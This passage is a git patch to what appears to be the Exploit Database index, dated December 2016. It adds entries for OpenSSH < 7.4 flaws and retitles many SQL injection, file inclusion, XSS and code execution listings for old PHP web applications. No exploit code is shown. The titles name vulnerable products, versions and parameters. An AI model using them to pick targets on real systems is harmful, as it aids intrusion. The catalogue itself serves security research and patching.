From 897e1fa191224ae5301eea5c6006316dd37513ce Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 24 Dec 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-12-24 3 new exploits WinFTP Server 2.0.2 - (PASV) Remote Denial of Service WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service WinFTP Server 2.3.0 - (NLST) Denial of Service WinFTP Server 2.3.0 - 'NLST' Denial of Service vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC) vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC) OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit) X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit) OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading X7 Chat 2.0 - (help_file) Remote Command Execution X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution Ultimate WebBoard 3.00 - (Category) SQL Injection PromoteWeb MySQL - 'go.php id' SQL Injection 212Cafe Board 0.07 - (view.php qID) SQL Injection Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection PromoteWeb MySQL - 'id' Parameter SQL Injection 212Cafe Board 0.07 - 'qID' Parameter SQL Injection The Gemini Portal - 'lang' Remote File Inclusion RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection ASPapp KnowledgeBase - 'catid' SQL Injection The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection ASPapp KnowledgeBase - 'catid' Parameter SQL Injection X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion CoAST 0.95 - (sections_file) Remote File Inclusion Real Estate Manager - 'cat_id' SQL Injection LnBlog 0.9.0 - (plugin) Local File Inclusion PlugSpace 0.1 - (index.php navi) Local File Inclusion MyCard 1.0.2 - (gallery.php id) SQL Injection PowerPortal 2.0.13 - 'path' Local Directory Traversal PHP-Lance 1.52 - (show.php catid) SQL Injection Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion PlugSpace 0.1 - 'navi' Parameter Local File Inclusion MyCard 1.0.2 - 'id' Parameter SQL Injection PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal PHP-Lance 1.52 - 'catid' Parameter SQL Injection Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection Pro Chat Rooms 3.0.3 - (guid) SQL Injection Pilot Group eTraining - 'news_read.php id' SQL Injection BbZL.php 0.92 - (lien_2) Local Directory Traversal Pro Chat Rooms 3.0.3 - SQL Injection Pilot Group eTraining - 'news_read.php' SQL Injection BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal Arcadem Pro - 'articlecat' SQL Injection Arcadem Pro - 'articlecat' Parameter SQL Injection ArabCMS - 'rss.php rss' Local File Inclusion FAQ Management Script - 'catid' SQL Injection ArabCMS - 'rss.php' Local File Inclusion FAQ Management Script - 'catid' Parameter SQL Injection BookMarks Favourites Script - 'view_group.php id' SQL Injection BookMarks Favourites Script - 'id' Parameter SQL Injection BMForum 5.6 - (tagname) SQL Injection BMForum 5.6 - 'tagname' Parameter SQL Injection Crux Gallery 1.32 - (index.php theme) Local File Inclusion phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution RPortal 1.1 - (file_op) Remote File Inclusion Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution RPortal 1.1 - 'file_op' Parameter Remote File Inclusion Link Trader - 'ratelink.php lnkid' SQL Injection Link Trader - 'lnkid' Parameter SQL Injection OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion OpenX 2.6 - (ac.php bannerid) Blind SQL Injection OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection X7 Chat 2.0.5 - Authentication Bypass Arcadem Pro 2.8 - (article) Blind SQL Injection Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection Link Trader - (lnkid) SQL Injection phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit) phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit) PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting BMForum 3.0 - 'topic.php' Cross-Site Scripting BMForum 3.0 - 'forums.php' Cross-Site Scripting BMForum 3.0 - 'post.php' Cross-Site Scripting BMForum 3.0 - 'announcesys.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - 'index.php' Cross-Site Scripting BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting Pilot Group eTraining - 'news_read.php' Cross-Site Scripting Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting Apache mod_session_crypto - Padding Oracle --- files.csv | 114 ++++----- platforms/linux/local/40962.txt | 26 ++ platforms/linux/remote/40963.txt | 33 +++ platforms/multiple/dos/40955.txt | 155 +++++++++++- platforms/multiple/webapps/40961.py | 376 ++++++++++++++++++++++++++++ platforms/php/webapps/10834.txt | 28 --- 6 files changed, 639 insertions(+), 93 deletions(-) create mode 100755 platforms/linux/local/40962.txt create mode 100755 platforms/linux/remote/40963.txt create mode 100755 platforms/multiple/webapps/40961.py delete mode 100755 platforms/php/webapps/10834.txt diff --git a/files.csv b/files.csv index a7326637b..7b5ac0676 100644 --- a/files.csv +++ b/files.csv @@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0 2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0 -2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 +2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0 @@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port 6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0 -6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 +6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 @@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0 -6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0 +6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0 6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0 @@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0 +40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port 35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 -35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 +35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 @@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0 40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80 +40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 -1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 +1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0 1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 @@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0 6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 -6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 -6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 +6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0 6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0 6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0 -6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 -6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0 -6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 +6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0 +6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0 +6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0 -6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0 +6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0 6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0 6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0 -6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 -6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0 -6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0 -6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0 -6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0 -6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 -6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 -6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0 +6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0 +6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0 +6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0 +6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0 +6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0 +6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0 +6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0 +6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0 6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0 -6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0 +6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0 6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0 6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0 -6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 -6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 -6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 +6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0 +6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 +6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0 6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 -6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0 +6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0 -6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0 -6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 +6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0 +6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0 6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0 6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0 -6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0 +6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0 6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0 6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0 -6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 +6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0 6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0 -6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 -6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0 -6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 +6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0 +6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0 +6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0 6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 -6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0 +6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0 6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 -6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 -6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0 +6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0 +6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 